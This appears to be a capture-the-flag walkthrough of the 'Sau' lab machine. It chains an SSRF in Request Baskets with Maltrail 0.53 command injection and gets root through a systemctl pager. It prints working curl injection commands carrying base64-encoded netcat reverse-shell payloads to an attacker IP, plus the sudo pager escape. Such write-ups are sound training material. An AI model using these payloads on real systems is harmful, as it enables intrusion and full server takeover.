SAU

SAU

‎$ whoami

Scanning

sudo nmap -A -T4 -v 10.10.11.224 -oA scans/scan

Found ports

5555 - http

image

It’s one of those request development websites, similar to requestbin.

image

Creating a basket and clicking around, we find “Forward URL” this makes me think SSRF.

Lets see if Request Baskets has any POCs we can use. 

searchsploit Request Baskets
image

YUP SSRF. 

searchsploit -m 51675
51675.sh

Looking at line 30:

PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";

Looks like it’s just setting the forward_url to the attacker server, and proxying the response. Lets try to confirm this vuln manually. 

echo '<html><body><h1>Vuln confirmed!</body></html>' > index.html
python3 -m http.server 80

Now, we can set the forward_url to our server, and proxy_response to true, and expand_path to true.

image

Now, visiting the basket we see:

image

On our server we can see the request came from the server itself and not from us.

image

Lets try to enumerate more information by pointing the server to itself, 127.0.0.1

image

Now visiting the bin:

image

We see Maltrail is running

💡
Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails

Maybe this version has a vuln?

searchsploit maltrail 0.53
image

This looks promising. 

searchsploit -m 51676
51676.py

Line 29:

command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"

Looks like a command injection vulnerability in the username parameter. This can be achieved by chaining a command with ;.

Lets exploit this manually.

;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`

Lets run netcat to verify we can execute code

nc -lvnp 8080

made a new basket called ‘ssrf’ we need to point this to localhost as well so access the maltrail login endpoint. The target URL: 

http://10.10.11.224:55555/ssrf/login
echo 'nc 10.10.14.32 8080' | base64
bmMgMTAuMTAuMTQuMzIgODA4MAo=
curl 'http://10.10.11.224:55555/ssrf/login' --data 'username=;`echo+\"bmMgMTAuMTAuMTQuMzIgODA4MAo=\"+|+base64+-d+|+sh`'

Setup listener

nc -lvp 8080
image

Confirmed we can execute code! Let’s stick a revshell into the payload 

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.32 8080 >/tmp/f' | base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjEwLjE0LjMyIDgwODAgPi90bXAvZgo=
curl 'http://10.10.11.224:55555/ssrf/login' --data 'username=;`echo+\"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjEwLjE0LjMyIDgwODAgPi90bXAvZgo=\"+|+base64+-d+|+sh`'

We got a shell!

image

Stabilize

python3 -c 'import pty;pty.spawn("/bin/bash")'

now lets check for privesc 

puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:/opt/maltrail$

Easy as that?

💡
Before using the pager I added my ssh key to the authorized keys on the box to ensure the pager wouldn’t break my terminal.

Should be as simple as typing !sh once we open the pager with sudo

sudo /usr/bin/systemctl status trail.service
image

That’s root!